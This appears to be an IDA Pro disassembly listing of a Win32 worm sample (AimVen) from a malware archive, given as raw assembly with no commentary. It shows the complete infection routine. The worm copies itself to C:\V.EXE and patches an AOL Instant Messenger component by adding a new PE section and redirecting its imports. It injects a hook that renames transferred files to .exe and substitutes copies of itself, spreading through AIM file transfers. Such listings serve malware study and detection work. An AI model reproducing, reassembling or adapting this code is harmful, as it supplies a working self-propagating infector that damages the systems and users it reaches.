;
; +-------------------------------------------------------------------------+
; |      This file was generated by The Interactive Disassembler (IDA)      |
; |           Copyright (c) 2024 Hex-Rays, <support@hex-rays.com>           |
; |                      License info: 48-2137-ACAB-99                      |
; |                                                                         |
; +-------------------------------------------------------------------------+
;
; Input SHA256 : 398788793486CA262BECC9B6A7A1D02C5B12E8981232CEEB01CBDE1B13AB4102
; Input MD5    : 06E8D9E9379E12145D612E39881DB7A2
; Input CRC32  : 9DA02403
; Compiler     : Visual C++ (guessed)

; File Name   : /home/petik/Downloads/virusshare/archivedwl-707/Win32/Worm.Win32.AimVen-398788793486ca262becc9b6a7a1d02c5b12e8981232ceeb01cbde1b13ab4102.ex_
; Format      : Portable executable for 80386 (PE)
; Imagebase   : 400000
; Section 1. (virtual address 00001000)
; Virtual size                  : 00001000 (   4096.)
; Section size in file          : 00000600 (   1536.)
; Offset to raw data for section: 00000600
; Flags C0000040: Data Readable Writable
; Alignment     : default

.686p
.mmx
.model flat


; Segment type: Pure code
; Segment permissions: Read/Write
CODE segment para public 'DATA' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing



public start
start proc near
call    GetCommandLineA
inc     eax
mov     esi, eax
mov     edi, offset ExistingFileName

loc_40100D:
cmp     byte ptr [esi], 22h ; '"'
jz      short loc_401015
movsb
jmp     short loc_40100D

loc_401015:
mov     byte ptr [edi], 0
push    1               ; bFailIfExists
push    offset NewFileName ; "C:\\V.EXE"
push    offset ExistingFileName ; lpExistingFileName
call    CopyFileA
push    4               ; dwFileAttributes
push    offset NewFileName ; "C:\\V.EXE"
call    SetFileAttributesA
push    0               ; hTemplateFile
push    0               ; dwFlagsAndAttributes
push    3               ; dwCreationDisposition
push    0               ; lpSecurityAttributes
push    0               ; dwShareMode
push    0C0000000h      ; dwDesiredAccess
push    offset FileName ; "C:\\PROGRA~1\\AIM95\\ICBMFT.OCM"
call    CreateFileA
cmp     eax, 0FFFFFFFFh
jnz     short loc_401058
jmp     loc_40128F

loc_401058:
mov     ds:hObject, eax
push    0               ; lpFileSizeHigh
push    ds:hObject      ; hFile
call    GetFileSize
mov     ds:nNumberOfBytesToRead, eax
add     eax, 2000h
push    eax             ; dwBytes
push    40h ; '@'       ; uFlags
call    GlobalAlloc
mov     ds:lpBuffer, eax
push    0               ; lpOverlapped
push    offset NumberOfBytesWritten ; lpNumberOfBytesRead
push    ds:nNumberOfBytesToRead ; nNumberOfBytesToRead
push    ds:lpBuffer     ; lpBuffer
push    ds:hObject      ; hFile
call    ReadFile
mov     esi, ds:lpBuffer
cmp     word ptr [esi], 5A4Dh
jz      short loc_4010B1
jmp     loc_401279

loc_4010B1:
add     esi, 3Ch ; '<'
mov     eax, [esi]
mov     ds:dword_4021AA, eax
sub     eax, 3Ch ; '<'
add     esi, eax
cmp     dword ptr [esi], 4550h
jz      short loc_4010CD
jmp     loc_401279

loc_4010CD:
mov     ax, [esi+6]
mov     ds:dword_4021AE, eax
inc     word ptr [esi+6]
mov     eax, [esi+28h]
add     eax, [esi+34h]
mov     edi, [esi+34h]
mov     ds:dword_4021B6, edi
mov     eax, [esi+50h]
mov     ds:dword_4021B2, eax
add     dword ptr [esi+50h], 1000h
mov     esi, ds:lpBuffer
add     esi, ds:dword_4021AA
add     esi, 0F8h
mov     eax, 28h ; '('
mov     ecx, ds:dword_4021AE

loc_401115:
cmp     dword ptr [esi], 7461642Eh
jz      short loc_40112B
cmp     dword ptr [esi], 6D69612Eh
jz      loc_401279
jmp     short loc_401130

loc_40112B:
call    sub_401136

loc_401130:
add     esi, eax
loop    loc_401115
jmp     short loc_4011B2
start endp




sub_401136 proc near

arg_0= dword ptr  4

push    esi
push    eax
lea     esi, [esi+8]
mov     eax, [esi]
push    eax
add     eax, 8
mov     [esi], eax
pop     eax
lea     esi, [esi+0Ch]
mov     ebx, [esi]
add     eax, ebx
mov     esi, ds:lpBuffer
add     esi, eax
mov     ebx, ds:dword_4021BA
mov     [esi], ebx
add     esi, 4
mov     ebx, ds:dword_4021BE
mov     [esi], ebx
mov     esi, ds:lpBuffer
lea     esi, [esi+8494h]
cmp     byte ptr [esi-2], 0FFh
jnz     loc_401279
mov     ebx, [esi]
mov     dword_40135F, ebx
add     eax, ds:dword_4021B6
mov     [esi], eax
mov     esi, ds:lpBuffer
lea     esi, [esi+87D2h]
mov     ebx, [esi]
mov     dword_40136A, ebx
add     eax, 4
mov     [esi], eax
cmp     byte ptr [esi-2], 0FFh
jnz     loc_401279
pop     eax
pop     esi
retn

loc_4011B2:
mov     dword ptr [esi], 6D69612Eh
mov     eax, 1000h
mov     [esi+8], eax
mov     eax, ds:dword_4021B2
mov     [esi+0Ch], eax
mov     eax, 126h
mov     [esi+10h], eax
mov     eax, ds:nNumberOfBytesToRead
mov     [esi+14h], eax
mov     eax, 0E0000020h
mov     [esi+24h], eax
push    offset ModuleName ; "kernel32.dll"
call    GetModuleHandleA
mov     ebx, eax
push    offset ProcName ; "CopyFileA"
push    ebx             ; hModule
call    GetProcAddress
mov     dword_401375, eax
push    offset aGetfileattribu ; "GetFileAttributesA"
push    ebx             ; hModule
call    GetProcAddress
mov     dword_401380, eax
push    offset aGlobalalloc ; "GlobalAlloc"
push    ebx             ; hModule
call    GetProcAddress
mov     dword_40138B, eax
push    offset aGlobalfree ; "GlobalFree"
push    ebx             ; hModule
call    GetProcAddress
mov     dword_401396, eax
mov     edi, ds:lpBuffer
add     edi, ds:nNumberOfBytesToRead
mov     eax, offset loc_401296
xchg    eax, esi
mov     ecx, 126h
rep movsb
push    0               ; dwMoveMethod
push    0               ; lpDistanceToMoveHigh
push    0               ; lDistanceToMove
push    ds:hObject      ; hFile
call    SetFilePointer
mov     eax, ds:nNumberOfBytesToRead
add     eax, 126h
push    0               ; lpOverlapped
push    offset NumberOfBytesWritten ; lpNumberOfBytesWritten
push    eax             ; nNumberOfBytesToWrite
push    ds:lpBuffer     ; lpBuffer
push    ds:hObject      ; hFile
call    WriteFile

loc_401279:             ; hObject
push    ds:hObject
call    CloseHandle
push    ds:lpBuffer     ; hMem
call    GlobalFree

loc_40128F:             ; uExitCode
push    0
call    ExitProcess

loc_401296:
pusha
mov     edi, [esp+20h+arg_0]
push    edi
call    loc_40137B
call    dword ptr [eax]
cmp     eax, 0FFFFFFFFh
jnz     short loc_4012AA
jmp     short loc_4012C4

loc_4012AA:
xor     al, al

loc_4012AC:
scasb
jnz     short loc_4012AC
mov     byte ptr [edi-4], 65h ; 'e'
mov     byte ptr [edi-3], 78h ; 'x'
mov     byte ptr [edi-2], 65h ; 'e'
mov     edi, [esp+20h+arg_0]
call    sub_401347

loc_4012C4:
popa
call    loc_40135A
mov     eax, [eax]
jmp     dword ptr [eax]
sub_401136 endp

pop     edi
call    loc_401365
mov     eax, [eax]
call    dword ptr [eax]
pusha
push    eax
pop     ebx
mov     edi, [ebp-10h]
push    edi
call    loc_40137B
call    dword ptr [eax]
cmp     eax, 0FFFFFFFFh
jnz     short loc_4012ED
jmp     short loc_401344

loc_4012ED:
cmp     eax, 10h
jnz     short loc_40132D
push    104h
push    40h ; '@'
call    loc_401386
call    dword ptr [eax]
test    eax, eax
jz      short loc_401344
push    eax
xchg    esi, edi
mov     edi, eax
mov     ecx, ebx
rep movsb
mov     byte ptr [edi], 5Ch ; '\'
call    loc_4013AC
inc     edi
mov     ecx, 0Ah
rep movsb
pop     edi
call    sub_401347
push    edi
call    loc_401391
call    dword ptr [eax]
jmp     short loc_401344

loc_40132D:
mov     byte ptr [edi+ebx-1], 65h ; 'e'
mov     byte ptr [edi+ebx-2], 78h ; 'x'
mov     byte ptr [edi+ebx-3], 65h ; 'e'
mov     edi, [ebp-10h]
call    sub_401347

loc_401344:
popa
jmp     edi



sub_401347 proc near
call    loc_40139C
call    loc_401370
push    1
push    edi
push    ebx
call    dword ptr [eax]
retn
sub_401347 endp




sub_401358 proc near
pop     eax
retn
sub_401358 endp ; sp-analysis failed


loc_40135A:
call    sub_401358
dword_40135F dd 0



sub_401363 proc near
pop     eax
retn
sub_401363 endp ; sp-analysis failed


loc_401365:
call    sub_401363
dword_40136A dd 0



sub_40136E proc near
pop     eax
retn
sub_40136E endp ; sp-analysis failed


loc_401370:
call    sub_40136E
dword_401375 dd 0



sub_401379 proc near
pop     eax
retn
sub_401379 endp ; sp-analysis failed


loc_40137B:
call    sub_401379
dword_401380 dd 0



sub_401384 proc near
pop     eax
retn
sub_401384 endp ; sp-analysis failed


loc_401386:
call    sub_401384
dword_40138B dd 0



sub_40138F proc near
pop     eax
retn
sub_40138F endp ; sp-analysis failed


loc_401391:
call    sub_40138F
dword_401396 dd 0



sub_40139A proc near
pop     ebx
retn
sub_40139A endp ; sp-analysis failed


loc_40139C:
call    sub_40139A
; CHAR NewFileName[]
NewFileName db 'C:\V.EXE',0



sub_4013AA proc near
pop     esi
retn
sub_4013AA endp ; sp-analysis failed


loc_4013AC:
call    sub_4013AA
push    edx
inc     ebp
inc     ecx
inc     esp
dec     ebp
inc     ebp
db      2Eh
inc     ebp
pop     eax
inc     ebp
db 0
; [00000006 BYTES: COLLAPSED FUNCTION CopyFileA]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA]
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess]
; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileAttributesA]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileSize]
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA]
; [00000006 BYTES: COLLAPSED FUNCTION GetProcAddress]
; [00000006 BYTES: COLLAPSED FUNCTION GlobalAlloc]
; [00000006 BYTES: COLLAPSED FUNCTION GlobalFree]
; [00000006 BYTES: COLLAPSED FUNCTION ReadFile]
; [00000006 BYTES: COLLAPSED FUNCTION SetFileAttributesA]
; [00000006 BYTES: COLLAPSED FUNCTION SetFilePointer]
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile]
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle]
align 200h
dd 280h dup(?)
CODE ends

; Section 2. (virtual address 00002000)
; Virtual size                  : 00001000 (   4096.)
; Section size in file          : 00000200 (    512.)
; Offset to raw data for section: 00000C00
; Flags C0000040: Data Readable Writable
; Alignment     : default

; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 402000h
db  4Ch ; L
db  65h ; e
db  67h ; g
db  61h ; a
db  6Ch ; l
db  20h
db  43h ; C
db  6Fh ; o
db  70h ; p
db  79h ; y
db  72h ; r
db  69h ; i
db  67h ; g
db  68h ; h
db  74h ; t
db  20h
db 0A9h
db  20h
db  41h ; A
db  4Fh ; O
db  4Ch ; L
db  20h
db  43h ; C
db  6Fh ; o
db  72h ; r
db  70h ; p
db  6Fh ; o
db  72h ; r
db  61h ; a
db  74h ; t
db  69h ; i
db  6Fh ; o
db  6Eh ; n
db  2Eh ; .
db  20h
db  41h ; A
db  6Ch ; l
db  6Ch ; l
db  20h
db  72h ; r
db  69h ; i
db  67h ; g
db  68h ; h
db  74h ; t
db  73h ; s
db  20h
db  72h ; r
db  65h ; e
db  73h ; s
db  65h ; e
db  72h ; r
db  76h ; v
db  65h ; e
db  64h ; d
db  21h ; !
db    0
; CHAR FileName[]
FileName db 'C:\PROGRA~1\AIM95\ICBMFT.OCM',0
; CHAR ModuleName[]
ModuleName db 'kernel32.dll',0
; CHAR ProcName[]
ProcName db 'CopyFileA',0
; CHAR aGetfileattribu[]
aGetfileattribu db 'GetFileAttributesA',0
; CHAR aGlobalalloc[]
aGlobalalloc db 'GlobalAlloc',0
; CHAR aGlobalfree[]
aGlobalfree db 'GlobalFree',0
; CHAR ExistingFileName[260]
ExistingFileName db 104h dup(0)
; HANDLE hObject
hObject dd 0
; DWORD nNumberOfBytesToRead
nNumberOfBytesToRead dd 0
; DWORD NumberOfBytesWritten
NumberOfBytesWritten dd 0
; LPCVOID lpBuffer
lpBuffer dd 0
dword_4021AA dd 0
dword_4021AE dd 0
dword_4021B2 dd 0
dword_4021B6 dd 0
dword_4021BA dd 11C12000h
dword_4021BE dd 11C12038h
align 1000h
DATA ends

; Section 3. (virtual address 00003000)
; Virtual size                  : 00001000 (   4096.)
; Section size in file          : 00000200 (    512.)
; Offset to raw data for section: 00000E00
; Flags C0000040: Data Readable Writable
; Alignment     : default

; Segment type: Externs
; _idata


;
; Imports from KERNEL32.dll
;
; BOOL (__stdcall *CopyFileA)(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
extrn __imp_CopyFileA:dword
; HANDLE (__stdcall *CreateFileA)(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn __imp_CreateFileA:dword
; void (__stdcall __noreturn *ExitProcess)(UINT uExitCode)
extrn __imp_ExitProcess:dword
; LPSTR (__stdcall *GetCommandLineA)()
extrn __imp_GetCommandLineA:dword
; DWORD (__stdcall *GetFileAttributesA)(LPCSTR lpFileName)
extrn __imp_GetFileAttributesA:dword
; DWORD (__stdcall *GetFileSize)(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn __imp_GetFileSize:dword
; HMODULE (__stdcall *GetModuleHandleA)(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA:dword
; FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName)
extrn __imp_GetProcAddress:dword
; HGLOBAL (__stdcall *GlobalAlloc)(UINT uFlags, SIZE_T dwBytes)
extrn __imp_GlobalAlloc:dword
; HGLOBAL (__stdcall *GlobalFree)(HGLOBAL hMem)
extrn __imp_GlobalFree:dword
; BOOL (__stdcall *ReadFile)(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn __imp_ReadFile:dword
; BOOL (__stdcall *SetFileAttributesA)(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn __imp_SetFileAttributesA:dword
; DWORD (__stdcall *SetFilePointer)(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn __imp_SetFilePointer:dword
; BOOL (__stdcall *WriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn __imp_WriteFile:dword
; BOOL (__stdcall *CloseHandle)(HANDLE hObject)
extrn __imp_CloseHandle:dword



end start
